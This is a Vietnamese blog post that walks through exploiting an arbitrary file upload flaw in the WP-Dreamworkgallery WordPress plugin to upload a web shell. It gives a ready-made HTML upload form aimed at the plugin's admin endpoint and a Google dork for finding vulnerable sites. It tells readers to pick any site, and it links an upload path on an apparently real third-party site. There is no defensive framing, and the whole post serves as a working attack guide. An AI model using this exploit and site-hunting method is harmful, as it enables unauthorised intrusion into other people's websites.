Bảo Mật

Khai thác lỗ hổng WordPress Plugin WP-Dreamworkgallery

Lỗi này cho phép chúng ta UpShell lên một cách thoải mái thông qua một file .html ngay từ localhost

Bước 1: Tạo 1 file Upload.html

<html>
<body>
<form action="http://www.web-bị-lỗi.com/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data">
<input type="hidden" name="task" value="drm_add_new_album" />
<input type="hidden" name="album_name" value="Arbitrary File Upload" />
<input type="hidden" name="album_desc" value="Arbitrary File Upload" />
<input type="file" name="album_img" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Bước 2: Tìm Web bị lỗi

Tìm lỗi bằng cách vào Google.com gõ lệnh

inurl:/wp-content/plugins/wp-dreamworkgallery/

Bước 3: Chọn 1 site bất kỳ

Thay link trang Web bị lỗi vào code ở Bước 1, nhớ Save lại nhé

Khai thác lỗ hổng Wordpress Plugin WP-Dreamworkgallery 3

Bước 4: Up Shell

Mở File Upload.html ở Bước 1 lên, và Up Shell lên

Lưu ý: Đoạn lỗi sau khi Up shell

Khai thác lỗ hổng Wordpress Plugin WP-Dreamworkgallery 4

Copy dòng này vào Link site bị lỗi là OK

http://www.presprint.rs/wp-content/uploads/dreamwork/334_uploadfolder/big/1.html

Đánh giá post

Rất Hữu ích

RatHuuIch là Website chia sẻ miễn phí tất cả các kiến thức về công nghệ thông tin. RatHuuIch cung cấp mọi giải pháp về mạng máy tính, phần mềm, đồ họa và MMO.

Bài liên quan

Theo dõi
Thông báo của
guest

0 Góp ý
Phản hồi nội tuyến
Xem tất cả bình luận
Check Also
Close
Back to top button